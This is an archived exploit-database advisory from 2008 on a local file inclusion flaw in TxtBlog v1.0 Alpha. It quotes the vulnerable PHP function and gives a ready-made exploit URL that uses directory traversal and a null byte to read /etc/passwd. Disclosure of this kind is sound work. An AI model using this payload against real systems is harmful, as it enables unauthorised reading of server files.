TxtBlog (index.php m) Local File Inclusion Vulnerability

vendor:

TxtBlogCMS

by:

CWH Underground

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: TxtBlogCMS

Affected Version From: v.1.0 Alpha

Affected Version To: v.1.0 Alpha

Patch Exists: Yes

Related CWE: N/A

CPE: a:txtblogcms:txtblogcms:1.0a

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

TxtBlog (index.php m) Local File Inclusion Vulnerability

A vulnerability exists in TxtBlog v.1.0 Alpha, which allows an attacker to include arbitrary files from the local system. This is due to a lack of proper sanitization of user-supplied input to the 'y' and 'm' parameters in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../') to the vulnerable script. This will allow the attacker to include arbitrary files from the local system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of TxtBlog.

Source

Exploit-DB raw data:

============================================================
  TxtBlog (index.php m) Local File Inclusion Vulnerability
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : TxtBlog
 VERSION     : v.1.0 Alpha
 DOWNLOAD    : http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip
#####################################################

--- Local File Inclusion ---

-----------------------------
 Vulnerable File (index.php)
-----------------------------

function showMonth() {
	global $config_date_format, $txtblog_body, $txtblog_title, $config_title;

	$txtblog_body = "";
	$txtblog_title = "$config_title - Archives";

	$year = $_GET['y'];			
	$month = $_GET['m'];				

	$files = findFiles("data/$year/$month");	<<< BUG !!!!
	
	if (isset($files)) {
	foreach ($files as $file) {
				
		include ("data/$year/$month/$file");	<<< BUG !!!!
		$date_array = explode(" ",$date);
		$date = date($config_date_format, mktime($date_array[0], $date_array[1], $date_array[2], $date_array[3], $date_array[4], $date_array[5]));
		$txtblog_body .= "<span class='blog_title'>$title</span><br>\n<span class='blog_date'>$date</span><br>\n".bb2html($blog)."<br>\n<hr size='1'>\n";

	}
	}
}

---------
 Exploit
---------

[+] http://[Target]/[txtblogcms_path]/index.php?y=2005&m=01/../../../../../../../../etc/passwd%00


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-27]